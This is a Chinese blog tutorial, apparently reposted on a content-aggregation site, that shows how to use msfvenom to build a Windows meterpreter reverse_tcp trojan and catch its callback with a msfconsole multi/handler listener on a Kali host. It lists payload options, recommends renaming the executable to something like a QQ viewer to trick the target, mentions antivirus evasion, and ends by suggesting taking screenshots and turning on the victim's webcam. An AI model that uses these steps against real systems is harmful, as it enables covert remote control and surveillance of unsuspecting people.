msfvenom的简单使用

更新时间:2024-11-06 18:19:18 阅读: 评论:0


2023年5月23日发(作者:reflector)

msfvenom的简单使⽤

下⾯简单的演⽰⼀下msfvenom的简单使⽤,

攻击者:kali Linux ip:192.168.187.130

靶机:Windows10

思路:利⽤msfvenom制作 .exe ⽂件,然后发送到靶机Windows上⾯,运⾏后就可以在kali linux 上⾯利⽤msfconsole连接msfvenom服务

控制靶机

1. 在kali Linux 上⾯启动⼀个终端 执⾏以下命令

msfvenom -l | grep windows | grep x64 | grep tcp

列出所有可以⽤的并在屏幕显⽰条⽬中有 Windows x64 tcp 的

payload在这⾥我们选择windows/x64/meterpreter/reverse_tcp

下⾯是使⽤msfvenom的部分参数,是⽐较常⽤的

-p 选择⼀个payload

-l 载荷列表

-f ⽣成的⽂件格式

-e 编码⽅式

-i 编码次数

-b 在⽣成的程序中避免出现的值

-x 允许我们指定⼀个⾃定义的可执⾏⽂件作为模板,也就是将⽊马捆绑到这个可执⾏⽂件上。

-h 帮助

在这⾥,我们⽣成⼀个的⽊马⽂件(⽂件在root⽂件夹下),控制端的ip为192.168.187.130,端⼝号为4444。然后利⽤这个⽊马传给

靶机,可以改⼀改名字,⽐如 QQ坦⽩说查看器之类的,杀毒软件可能报毒,其实是需要免杀处理的,后⾯学了再说吧。

2. 利⽤msfconsole监听

启动msfconsole 漫长的等待..................................................

然后报错了,

然后查了⼀下,分配的内存不够

这样解决有点慢,我有⼀个更暴⼒的,既然内存不⾜,我就把虚拟机分配给kali Linux的内存加到2G,OK问题解决

键⼊以下命令:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.187.130

set lport 4444

exploit

然后就可以等待了,当靶机点击了那个⽂件时

就可以开始你的表演了,⽐如截图,打开摄像头等等


本文发布于:2023-05-23 14:33:40,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/falv/fa/78/100590.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

相关文章
留言与评论(共有 0 条评论)
   
验证码:
推荐文章
排行榜
Copyright ©2019-2022 Comsenz Inc.Powered by © 站长QQ:55-9-10-26